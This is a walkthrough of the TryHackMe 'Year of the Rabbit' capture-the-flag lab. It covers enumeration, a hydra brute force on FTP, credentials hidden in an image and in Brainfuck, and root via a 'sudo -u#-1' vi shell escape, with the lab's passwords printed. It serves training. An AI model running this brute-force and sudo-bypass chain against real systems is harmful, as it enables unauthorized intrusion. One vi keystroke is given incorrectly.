Introduction

In this walkthrough, I’ll unravel “Year of the Rabbit” — an easy-level CTF from TryHackMe. This challenge guides you through classic enumeration and web exploitation steps, with creative clues and a touch of humor along the way. Whether you’re sharpening your skills or just love a good puzzle, here’s how I approached and conquered this box.

Step 1: Enumeration and Port Scanning

I kicked off the challenge with an Nmap scan to map out the exposed services and probable entry points. The command used:

nmap -sCV -vv <target-ip>

The results revealed three open ports:

• Port 21: FTP
• Port 22: SSH
• Port 80: HTTP

Step 2: Directory Fuzzing and Web Clues

With port 80 open, I explored the web service and ran Gobuster to uncover hidden directories:

gobuster dir -u <target-ip> -w /usr/share/wordlists/dirb/common.txt

The scan uncovered an interesting directory: /assets.

Visiting http://<target-ip>/assets led to a web page containing several static files. Inspecting the CSS revealed a playful comment:
“Ahhh.., did not expect that NEVER GONNA GIVE UP!!!”

Step 3: Burp Suite Interception and Discovering Hidden Functionality

With no obvious leads from the static files or CSS, I turned to Burp Suite to intercept HTTP requests and look for anything unusual.

While monitoring the web traffic, I noticed a request for /sup3r_s3c3rt_fl4g.php—a hidden directory not previously revealed during directory enumeration.

Navigating to this secret path opened up a new layer of the challenge, and it was clear there was something sensitive being protected. This set the stage for deeper investigation.

Step 4: Analyzing Hidden Files and Extracting Credentials

Inside the secret directory, I found a file named Hot_babe.png. Suspecting there may be hidden clues, I downloaded the file for further inspection.

First, I ran exiftool to look for embedded metadata:

exiftool Hot_babe.png

While the metadata was intriguing, the true breakthrough came from searching for printable strings inside the image:

strings Hot_babe.png

This revealed both a username (ftpuser) and a list of possible passwords cleverly concealed within the file content. To automate the login attempts, I copied the passwords into a file named rabbit.txt:

sudo nano rabbit.txt

Step 5: Brute Forcing FTP Credentials with Hydra

Armed with the username ftpuser and a list of potential passwords saved in rabbit.txt, I used Hydra to automate the brute-force attack on the FTP service:

hydra -l ftpuser -P rabbit.txt ftp://<target-ip>

After some time, Hydra cracked the password:

Password: 5iez1wGXKfPKQ

Using these credentials, I logged in successfully to the FTP server.

Step 6: Accessing Sensitive Files in FTP

Upon logging into the FTP server, I explored the directories and discovered a file named Eli’s_Creds.txt.

Using the FTP client, I downloaded this file with:

get Eli’s_Creds.txt

Viewing the file contents revealed an encoded string that seemed suspiciously like Brainfuck code. This pointed towards the next puzzle: decoding this string to unveil usable credentials.

Step 7: Decoding Brainfuck and Gaining SSH Access

After recognizing that the content of Eli’s_Creds.txt was encoded in Brainfuck, I used an online Brainfuck decoder to translate it.

The decoded output revealed SSH credentials:

• Username: eli
• Password: DSpDiMlwAEwid

Using these credentials, I accessed the machine via SSH:

ssh eli@<target-ip>

Step 8: Searching for Secrets and User Switching

Using the locate command, I searched the file system for any files or directories containing “s3cr3t”:

locate s3cr3t

This led me to an executable file associated with the hint. Examining this file revealed a password for another user.

With this new information, I switched SSH access to the user “Gwendoline”:

• Username: Gwendoline
• Password: MniVCQVhQHUNI

After logging in as Gwendoline, I found and captured the user flag, marking the completion of the initial access phase.

Step 9: Privilege Escalation via Sudo and vi Editor

To escalate privileges, I checked the commands available to the current user with:

sudo -l

This revealed that the user could run the vi editor as root without a password, using the command:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

Once inside vi, I pressed ; followed by:

!/bin/sh

Step 10: Capturing the Root Flag

With root access obtained, I navigated to the root directory:

cd /root

I then read the root flag file:

cat root.txt

Conclusion

“Year of the Rabbit” is an excellent beginner-level TryHackMe challenge that combines essential penetration testing skills like enumeration, web fuzzing, file analysis, credential cracking, and privilege escalation. It offers a balanced and educational experience, guiding newcomers through a realistic attack path while encouraging creative problem-solving.

Thank you for reading this walkthrough! If you found it helpful, please consider clapping and following for more in-depth write-ups. Your support motivates me to continue sharing valuable content.

Until the next write-up, happy hacking! 😊